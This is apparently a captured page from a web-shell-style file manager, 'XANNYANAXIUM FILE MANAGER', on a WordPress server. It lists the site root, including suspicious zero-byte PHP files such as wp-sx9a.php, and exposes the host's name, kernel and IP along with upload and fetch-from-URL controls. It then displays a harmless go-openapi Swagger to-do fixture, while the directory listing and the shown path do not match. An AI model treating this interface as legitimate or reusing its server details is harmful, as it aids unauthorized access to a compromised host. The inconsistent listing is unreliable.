XANNYANAXIUM FILE MANAGER

Navigate and manage your files

Current Directory
Upload File
Standard Upload
Advanced Upload

Status: No file selected

Create New
Name Type Size Modified Permission Actions
/ .. Directory — 2025-05-23 05:57:18 0755
/ wp-admin Directory — 2026-08-24 09:01:10 0755
/ wp-content Directory — 2026-09-23 15:34:11 0755
/ wp-includes Directory — 2026-09-23 15:34:04 0755
.htaccess HTACCESS 1.92 KB 2026-05-07 22:43:39 0644
.htaccess.bk BK 1.15 KB 2025-11-21 07:04:52 0644
.htaccess_old HTACCESS_OLD 1.80 KB 2025-11-21 07:14:55 0644
.user.ini INI 9 bytes 2026-01-05 06:16:59 0644
atomlib.php PHP 0 bytes 2026-09-22 09:09:48 0644
default.php PHP 15.99 KB 2025-05-23 12:16:32 0644
edits.php PHP 0 bytes 2026-09-22 08:49:13 0644
index.php PHP 1.30 KB 2026-09-22 06:21:28 0644
license.txt TXT 19.44 KB 2026-08-20 12:39:46 0644
phpinfo.php PHP 20 bytes 2025-05-23 05:57:32 0644
readme.html HTML 7.23 KB 2026-09-18 01:39:40 0644
robots.txt TXT 405 bytes 2026-09-22 07:12:19 0644
wp-activate.php PHP 7.54 KB 2026-08-20 12:39:46 0644
wp-blog-header.php PHP 351 bytes 2025-05-23 12:16:32 0644
wp-comments-post.php PHP 2.27 KB 2025-05-23 12:16:32 0644
wp-config-sample.php PHP 46 bytes 2026-09-23 15:34:06 0644
wp-config.php PHP 3.53 KB 2025-11-21 07:39:35 0644
wp-cron.php PHP 5.49 KB 2025-05-23 12:16:32 0644
wp-links-opml.php PHP 2.43 KB 2025-12-03 12:55:28 0644
wp-load.php PHP 3.84 KB 2025-05-23 12:16:32 0644
wp-login.php PHP 51.30 KB 2026-08-20 12:39:46 0644
wp-mail.php PHP 8.52 KB 2025-12-03 12:55:30 0644
wp-postnews.php PHP 12.59 KB 2026-09-23 09:22:15 0644
wp-settings.php PHP 32.38 KB 2026-08-20 12:39:46 0644
wp-signup.php PHP 34.26 KB 2026-08-20 12:39:46 0644
wp-sx9a.php PHP 0 bytes 2026-09-22 08:49:04 0644
wp-trackback.php PHP 5.27 KB 2026-08-20 12:39:46 0644
xmlrpc.php PHP 3.13 KB 2025-05-23 12:16:32 0644

Dir : /opt/go/pkg/mod/github.com/go-openapi/spec@v0.20.14/fixtures/specs/
Server: Linux in-mum-web1754.main-hosting.eu 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
IP: 77.37.46.203
Choose File :
Url:
Dir : //opt/go/pkg/mod/github.com/go-openapi/spec@v0.20.14/fixtures/specs/todos.json

{
  "swagger": "2.0",
  "info": {
    "version": "1.0",
    "title": "To-do Demo",
    "description": "This OAS2 (Swagger 2) file represents a real API that lives at http://todos.stoplight.io.\n\nFor authentication information, click the apikey security scheme in the editor sidebar.",
    "contact": {
      "name": "Stoplight",
      "url": "https://stoplight.io"
    },
    "license": {
      "name": "MIT"
    }
  },
  "host": "todos.stoplight.io",
  "schemes": ["http"],
  "consumes": ["application/json"],
  "produces": ["application/json"],
  "securityDefinitions": {
    "Basic": {
      "type": "basic"
    },
    "API Key": {
      "type": "apiKey",
      "name": "apikey",
      "in": "query"
    }
  },
  "paths": {
    "/todos/{todoId}": {
      "parameters": [{
        "name": "todoId",
        "in": "path",
        "required": true,
        "type": "string"
      }],
      "get": {
        "operationId": "GET_todo",
        "summary": "Get Todo",
        "tags": ["Todos"],
        "responses": {
          "200": {
            "description": "",
            "schema": {
              "$ref": "#/definitions/todo-full"
            },
            "examples": {
              "application/json": {
                "id": 1,
                "name": "get food",
                "completed": false,
                "completed_at": "1955-04-23T13:22:52.685Z",
                "created_at": "1994-11-05T03:26:51.471Z",
                "updated_at": "1989-07-29T11:30:06.701Z"
              },
              "/todos/foobar": "{\n\t\"foo\": \"bar\"\n}\n",
              "/todos/chores": {
                "id": 9000,
                "name": "Do Chores",
                "completed": false,
                "created_at": "2014-08-28T14:14:28.494Z",
                "updated_at": "2014-08-28T14:14:28.494Z"
              },
              "new": {
                "name": "esse qui proident labore",
                "completed": null,
                "id": 920778,
                "completed_at": "2014-01-07T07:49:55.123Z",
                "created_at": "1948-04-21T12:04:21.282Z",
                "updated_at": "1951-12-19T11:10:34.039Z",
                "user": {
                  "name": "irure deserunt fugiat",
                  "age": 121.45395681110494
                },
                "float": -47990796.228164576
              }
            }
          },
          "404": {
            "$ref": "./todos.common.json#/responses/404"
          },
          "500": {
            "$ref": "./todos.common.json#/responses/500"
          }
        },
        "parameters": [{
          "in": "query",
          "name": "",
          "type": "string"
        }]
      },
      "put": {
        "operationId": "PUT_todos",
        "summary": "Update Todo",
        "tags": ["Todos"],
        "parameters": [{
          "name": "body",
          "in": "body",
          "schema": {
            "$ref": "#/definitions/todo-partial",
            "example": {
              "name": "my todo's new name",
              "completed": false
            }
          }
        }],
        "responses": {
          "200": {
            "description": "",
            "schema": {
              "$ref": "#/definitions/todo-full"
            },
            "examples": {
              "application/json": {
                "id": 9000,
                "name": "It's Over 9000!!!",
                "completed": true,
                "completed_at": null,
                "created_at": "2014-08-28T14:14:28.494Z",
                "updated_at": "2015-08-28T14:14:28.494Z"
              }
            }
          },
          "401": {
            "$ref": "./todos.common.json#/responses/401"
          },
          "404": {
            "$ref": "./todos.common.json#/responses/404"
          },
          "500": {
            "$ref": "./todos.common.json#/responses/500"
          }
        },
        "security": [{
            "Basic": []
          },
          {
            "API Key": []
          }
        ]
      },
      "delete": {
        "operationId": "DELETE_todo",
        "summary": "Delete Todo",
        "tags": ["Todos"],
        "responses": {
          "204": {
            "description": ""
          },
          "401": {
            "$ref": "./todos.common.json#/responses/401"
          },
          "404": {
            "$ref": "./todos.common.json#/responses/404"
          },
          "500": {
            "$ref": "./todos.common.json#/responses/500"
          }
        },
        "security": [{
            "Basic": []
          },
          {
            "API Key": []
          }
        ]
      }
    },
    "/todos": {
      "post": {
        "operationId": "POST_todos",
        "summary": "Create Todo",
        "tags": ["Todos"],
        "parameters": [{
          "name": "body",
          "in": "body",
          "schema": {
            "$ref": "#/definitions/todo-partial",
            "example": {
              "name": "my todo's name",
              "completed": false
            }
          }
        }],
        "responses": {
          "201": {
            "description": "",
            "schema": {
              "$ref": "#/definitions/todo-full"
            },
            "examples": {
              "application/json": {
                "id": 9000,
                "name": "It's Over 9000!!!",
                "completed": null,
                "completed_at": null,
                "created_at": "2014-08-28T14:14:28.494Z",
                "updated_at": "2014-08-28T14:14:28.494Z"
              },
              "/todos/chores": {
                "id": 9000,
                "name": "Do Chores",
                "completed": false,
                "created_at": "2014-08-28T14:14:28.494Z",
                "updated_at": "2014-08-28T14:14:28.494Z"
              }
            }
          },
          "401": {
            "$ref": "./todos.common.json#/responses/401"
          },
          "500": {
            "$ref": "./todos.common.json#/responses/500"
          }
        },
        "security": [{
            "API Key": []
          },
          {
            "Basic": []
          }
        ],
        "description": "This creates a Todo object.\n\nTesting `inline code`."
      },
      "get": {
        "operationId": "GET_todos",
        "summary": "List Todos",
        "tags": ["Todos"],
        "parameters": [{
            "$ref": "#/parameters/limit"
          },
          {
            "$ref": "#/parameters/skip"
          }
        ],
        "responses": {
          "200": {
            "description": "",
            "schema": {
              "type": "array",
              "items": {
                "$ref": "#/definitions/todo-full"
              }
            },
            "examples": {
              "application/json": [{
                  "id": 1,
                  "name": "design the thingz",
                  "completed": true
                },
                {
                  "id": 2,
                  "name": "mock the thingz",
                  "completed": true
                },
                {
                  "id": 3,
                  "name": "code the thingz",
                  "completed": false
                }
              ],
              "empty": []
            },
            "headers": {
              "foo": {
                "type": "string",
                "default": "bar"
              }
            }
          },
          "500": {
            "$ref": "./todos.common.json#/responses/500"
          }
        },
        "description": "​"
      }
    }
  },
  "parameters": {
    "limit": {
      "name": "limit",
      "in": "query",
      "description": "This is how it works.",
      "required": false,
      "type": "integer",
      "maximum": 100
    },
    "skip": {
      "name": "skip",
      "in": "query",
      "required": false,
      "type": "string"
    }
  },
  "definitions": {
    "todo-partial": {
      "title": "Todo Partial",
      "type": "object",
      "properties": {
        "name": {
          "type": "string"
        },
        "completed": {
          "type": ["boolean", "null"]
        }
      },
      "required": ["name", "completed"]
    },
    "todo-full": {
      "title": "Todo Full",
      "allOf": [{
          "$ref": "#/definitions/todo-partial"
        },
        {
          "type": "object",
          "properties": {
            "id": {
              "type": "integer",
              "minimum": 0,
              "maximum": 1000000
            },
            "completed_at": {
              "type": ["string", "null"],
              "format": "date-time"
            },
            "created_at": {
              "type": "string",
              "format": "date-time"
            },
            "updated_at": {
              "type": "string",
              "format": "date-time"
            },
            "user": {
              "$ref": "./todos.common.json#/definitions/user"
            }
          },
          "required": ["id", "user"]
        }
      ]
    }
  },
  "tags": [{
    "name": "Todos"
  }]
}